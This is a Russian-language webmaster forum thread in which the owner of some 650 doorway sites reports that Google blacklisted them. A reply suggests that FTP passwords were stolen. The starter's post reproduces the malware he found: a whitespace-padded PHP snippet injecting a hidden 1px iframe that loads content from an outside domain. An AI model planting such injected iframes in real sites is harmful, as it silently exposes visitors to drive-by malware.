X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите разобратся
kesn
kesn
Topic Starter сообщение 22.1.2013, 15:20; Ответить: kesn
Сообщение #1


Мужики подскажите че делать, гугл все доры поблакировал.
Везде в серпе Предупреждение - посещение этого сайта может нанести вред Вашему компьютеру!
650 дорвеев пострадали, код ниже я его выложил. Трафф с 25к в сутки упал до 3 человек, охренеть...
На всех дорах пишет что вирус вызывался с тдски, точнее с хтаккса где была размещена дрянь.
Вот пример моего сайта нулячего где размещена эта дрянь http://emcala.com/


Безопасный просмотр
Страница диагностики для blabla.com

Занесен ли сайт blabla.com в список подозрительных?

Сайт занесен в список подозрительных. Посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта за последние 90 дней была замечена подозрительная активность (число таких случаев: 1).

Что произошло во время последнего посещения этого сайта компанией Google?
На 0 из 3 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя. Последнее посещение этого сайта системой Google произошло 2013-01-21; последний раз подозрительный контент был обнаружен на этом сайте 2013-01-21.

Вредоносное ПО включает 656 exploit(s).

Сетей, в которых размещался этот сайт: 1 (в том числе (CAMELHOST)).

Был ли этот сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт blabla.com использовался в качестве промежуточного звена для заражения других сайтов. Число зараженных сайтов: 48 (в том числе site1.by/, site2.com/, site3.us/).

Размещалось ли на этом сайте вредоносное ПО?

Да. За последние 90 дней на этом сайте размещалось вредоносное ПО. Число зараженных им доменов: 48 (в том числе site2.com/, site1.us/, site3.com/).



Вот такая дрянь размещена в хтаксе и почти во всех файлах тдски расширения php, html:



#e2aa4e#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var zzf = document.createElement('iframe');    zzf.src = 'http://sumjecyg.ru/count15.php';    zzf.style.position = 'absolute';    zzf.style.border = '0';    zzf.style.height = '1px';    zzf.style.width = '1px';    zzf.style.left = '1px';    zzf.style.top = '1px';    if (!document.getElementById('zzf')) {        document.write('<div id=\'zzf\'></div>');        document.getElementById('zzf').appendChild(zzf);    }})();</script>";

#/e2aa4e#



А скрипт вызывался с файла share42.js

http://whoistory.com/2012/12/22/ домен http://sumjecyg.ru/ на котором стоит крипт был зареган недавно, вот м*даки, весь биз подосрали.

Дрянь эту я везде поубирал впринципе, перенес доры на другой серв, как долго теперь ждать когда это предупреждение уберется и уберется ли оно вообще?

.

Сообщение отредактировал kesn - 22.1.2013, 14:59


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ne0n
ne0n
сообщение 24.1.2013, 18:54; Ответить: ne0n
Сообщение #2


Сталкивался на обычных проектах (не дорвеях), если все вычистили, то предупреждения исчезнут после очередной проверки ПС (не больше 3х дней вроде у Гугл у меня было).

P.S. По #e2aa4e# предположу, что скорее всего у вас вредоносное ПО увело пароли от FTP и по FTP обновило файлы. Возможно повторится такое и на другом сервере. Поищите у себя на компьютере(ах) вирусы от куда ходите по FTP на сервер. Но это конечно не 100%, может так помечает свой код не только такое ПО.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


Сообщение отредактировал ne0n - 24.1.2013, 19:04
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Помогите вспомнить рекламного бота Телеграм для обмена рекламой
0 Mixatraider 692 21.2.2024, 23:42
автор: Mixatraider
Открытая тема (нет новых ответов) Помогите рещить проблему с монитором.
Почему низкое разрешение при подключении монитора через displayport?
0 Levels 1695 11.12.2020, 0:48
автор: Levels
Открытая тема (нет новых ответов) Помогите кто нибудь получить партнерку Росбанк!
7 heisenberg_mw 2315 7.8.2020, 9:28
автор: heisenberg_mw
Открытая тема (нет новых ответов) Помогите найти тему пожалуйста
7 virtas 12400 24.7.2020, 17:02
автор: -JamesSmips-
Открытая тема (нет новых ответов) Помогите с поиском доноров
3 tehno_music 3331 4.11.2019, 17:15
автор: goblin78


 



RSS Текстовая версия Сейчас: 28.3.2024, 18:59
Дизайн